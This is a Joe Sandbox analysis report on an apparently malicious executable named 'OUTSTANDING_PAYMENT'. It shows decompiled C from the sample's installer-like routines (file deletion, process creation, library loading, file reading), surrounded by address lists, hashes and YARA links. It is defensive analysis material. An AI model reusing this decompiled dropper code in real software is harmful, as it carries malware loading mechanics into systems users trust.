                                                                                                                        0x004072cb
                                                                                                                        0x004072ce
                                                                                                                        0x004072d1
                                                                                                                        0x004072d4
                                                                                                                        0x004072d7
                                                                                                                        0x004072f0
                                                                                                                        0x004072f2
                                                                                                                        0x004072f5
                                                                                                                        0x004072f6
                                                                                                                        0x004072f9
                                                                                                                        0x004072fb
                                                                                                                        0x004072fe
                                                                                                                        0x00407300
                                                                                                                        0x00407302
                                                                                                                        0x00407305
                                                                                                                        0x00407307
                                                                                                                        0x0040730a
                                                                                                                        0x0040730e
                                                                                                                        0x00407310
                                                                                                                        0x00407310
                                                                                                                        0x00407311
                                                                                                                        0x00407314
                                                                                                                        0x00407317
                                                                                                                        0x004072d9
                                                                                                                        0x004072d9
                                                                                                                        0x004072e1
                                                                                                                        0x004072e6
                                                                                                                        0x004072e8
                                                                                                                        0x004072eb
                                                                                                                        0x004072eb
                                                                                                                        0x0040731a
                                                                                                                        0x00407321
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00407321
                                                                                                                        0x00407234
                                                                                                                        0x00407237
                                                                                                                        0x00407239
                                                                                                                        0x0040723c
                                                                                                                        0x0040723f
                                                                                                                        0x00407242
                                                                                                                        0x00407244
                                                                                                                        0x00407247
                                                                                                                        0x0040724a
                                                                                                                        0x0040724a
                                                                                                                        0x0040724d
                                                                                                                        0x0040724d
                                                                                                                        0x00407250
                                                                                                                        0x00407257
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00407257
                                                                                                                        0x004071dd
                                                                                                                        0x004071e0
                                                                                                                        0x004071e2
                                                                                                                        0x004071e5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406f44
                                                                                                                        0x00406f44
                                                                                                                        0x00406f48
                                                                                                                        0x0040758d
                                                                                                                        0x00000000
                                                                                                                        0x0040758d
                                                                                                                        0x00406f4e
                                                                                                                        0x00406f51
                                                                                                                        0x00406f54
                                                                                                                        0x00406f57
                                                                                                                        0x00406f5a
                                                                                                                        0x00406f5d
                                                                                                                        0x00406f60
                                                                                                                        0x00406f62
                                                                                                                        0x00406f65
                                                                                                                        0x00406f68
                                                                                                                        0x00406f6b
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070cf
                                                                                                                        0x004070cf
                                                                                                                        0x004070d3
                                                                                                                        0x00407599
                                                                                                                        0x00000000
                                                                                                                        0x00407599
                                                                                                                        0x004070d9
                                                                                                                        0x004070dc
                                                                                                                        0x004070df
                                                                                                                        0x004070e2
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e7
                                                                                                                        0x004070ea
                                                                                                                        0x004070ed
                                                                                                                        0x004070f0
                                                                                                                        0x004070f3
                                                                                                                        0x004070f6
                                                                                                                        0x004070f7
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070fc
                                                                                                                        0x004070ff
                                                                                                                        0x00407102
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407108
                                                                                                                        0x0040710a
                                                                                                                        0x0040710a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x00407350
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407356
                                                                                                                        0x00407359
                                                                                                                        0x0040735c
                                                                                                                        0x0040735f
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407364
                                                                                                                        0x00407367
                                                                                                                        0x0040736a
                                                                                                                        0x0040736d
                                                                                                                        0x00407370
                                                                                                                        0x00407373
                                                                                                                        0x00407374
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407379
                                                                                                                        0x0040737c
                                                                                                                        0x0040737f
                                                                                                                        0x00407382
                                                                                                                        0x00407385
                                                                                                                        0x00407389
                                                                                                                        0x0040738b
                                                                                                                        0x0040738e
                                                                                                                        0x00000000
                                                                                                                        0x00407390
                                                                                                                        0x0040710d
                                                                                                                        0x0040710d
                                                                                                                        0x00000000
                                                                                                                        0x0040710d
                                                                                                                        0x0040738e
                                                                                                                        0x004075c3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x004075fa
                                                                                                                        0x004075fa
                                                                                                                        0x00000000
                                                                                                                        0x004075fa
                                                                                                                        0x00407447
                                                                                                                        0x004073ce
                                                                                                                        0x004073cb

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                        • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                                                        • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                                                        • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405D2C Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 41%
                                                                                                                        			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406133(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                                                                                        0x00405d2d
                                                                                                                        0x00405d38
                                                                                                                        0x00405d3d
                                                                                                                        0x00405d6d
                                                                                                                        0x00000000
                                                                                                                        0x00405d6d
                                                                                                                        0x00405d44
                                                                                                                        0x00405d45
                                                                                                                        0x00405d4f
                                                                                                                        0x00405d47
                                                                                                                        0x00405d47
                                                                                                                        0x00405d47
                                                                                                                        0x00405d57
                                                                                                                        0x00405d63
                                                                                                                        0x00405d67
                                                                                                                        0x00405d67
                                                                                                                        0x00000000
                                                                                                                        0x00405d59
                                                                                                                        0x00000000
                                                                                                                        0x00405d5b

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                                                          • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                                                        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1655745494-0
                                                                                                                        • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                                                        • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                                                                                        • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                                                        • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406AE0 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00406AE0(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A71(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                                                                                                                        0x00406af1
                                                                                                                        0x00406b08
                                                                                                                        0x00406afc
                                                                                                                        0x00406b06
                                                                                                                        0x00406b06
                                                                                                                        0x00406b13
                                                                                                                        0x00406b1f

                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2567322000-0
                                                                                                                        • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                                                        • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                                                                                        • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                                                        • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                                                                                        0x00403375
                                                                                                                        0x0040337e
                                                                                                                        0x00403387
                                                                                                                        0x0040338b
                                                                                                                        0x00403396
                                                                                                                        0x00403396
                                                                                                                        0x0040339e
                                                                                                                        0x004033a5
                                                                                                                        0x004033b7
                                                                                                                        0x004033be
                                                                                                                        0x00403463
                                                                                                                        0x00403463
                                                                                                                        0x00000000
                                                                                                                        0x004033c4
                                                                                                                        0x004033c7
                                                                                                                        0x004033d3
                                                                                                                        0x004033d7
                                                                                                                        0x00403471
                                                                                                                        0x00403471
                                                                                                                        0x004033dd
                                                                                                                        0x004033e0
                                                                                                                        0x0040343f
                                                                                                                        0x00403445
                                                                                                                        0x00403447
                                                                                                                        0x00403447
                                                                                                                        0x00403459
                                                                                                                        0x00403461
                                                                                                                        0x00403468
                                                                                                                        0x0040346b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004033e2
                                                                                                                        0x004033e5
                                                                                                                        0x00000000
                                                                                                                        0x004033eb
                                                                                                                        0x004033f0
                                                                                                                        0x004033f7
                                                                                                                        0x004033fa
                                                                                                                        0x004033fc
                                                                                                                        0x004033fc
                                                                                                                        0x00403409
                                                                                                                        0x0040340c
                                                                                                                        0x00403413
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040341c
                                                                                                                        0x00403423
                                                                                                                        0x0040343b
                                                                                                                        0x00403465
                                                                                                                        0x00403465
                                                                                                                        0x00403425
                                                                                                                        0x00403425
                                                                                                                        0x00403428
                                                                                                                        0x0040342b
                                                                                                                        0x00403431
                                                                                                                        0x00403437
                                                                                                                        0x00000000
                                                                                                                        0x00403439
                                                                                                                        0x00000000
                                                                                                                        0x00403439
                                                                                                                        0x00403437
                                                                                                                        0x00000000
                                                                                                                        0x00403423
                                                                                                                        0x00000000
                                                                                                                        0x004033f0
                                                                                                                        0x004033e5
                                                                                                                        0x004033e0
                                                                                                                        0x004033d7
                                                                                                                        0x004033be
                                                                                                                        0x00403473
                                                                                                                        0x00403476

                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                        • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                                                        • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                        • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 69%
                                                                                                                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                                                                                        0x0040138a
                                                                                                                        0x004013fa
                                                                                                                        0x0040139b
                                                                                                                        0x004013a0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004013a2
                                                                                                                        0x004013a3
                                                                                                                        0x004013ad
                                                                                                                        0x00000000
                                                                                                                        0x00401404
                                                                                                                        0x004013b0
                                                                                                                        0x004013b7
                                                                                                                        0x004013bd
                                                                                                                        0x004013be
                                                                                                                        0x004013c0
                                                                                                                        0x004013c2
                                                                                                                        0x004013b9
                                                                                                                        0x004013b9
                                                                                                                        0x004013ba
                                                                                                                        0x004013ba
                                                                                                                        0x004013c9
                                                                                                                        0x004013cb
                                                                                                                        0x004013f4
                                                                                                                        0x004013f4
                                                                                                                        0x004013c9
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                        • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                                                        • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                                                        • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                        0x00405c54
                                                                                                                        0x00405c74
                                                                                                                        0x00405c7c
                                                                                                                        0x00405c81
                                                                                                                        0x00000000
                                                                                                                        0x00405c87
                                                                                                                        0x00405c8b

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3712363035-0
                                                                                                                        • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                                                        • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                                                        • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                                                        • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                        0x00406a3d
                                                                                                                        0x00406a40
                                                                                                                        0x00406a47
                                                                                                                        0x00406a4f
                                                                                                                        0x00406a5b
                                                                                                                        0x00000000
                                                                                                                        0x00406a62
                                                                                                                        0x00406a52
                                                                                                                        0x00406a59
                                                                                                                        0x00000000
                                                                                                                        0x00406a6a
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                                          • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                          • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                                          • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
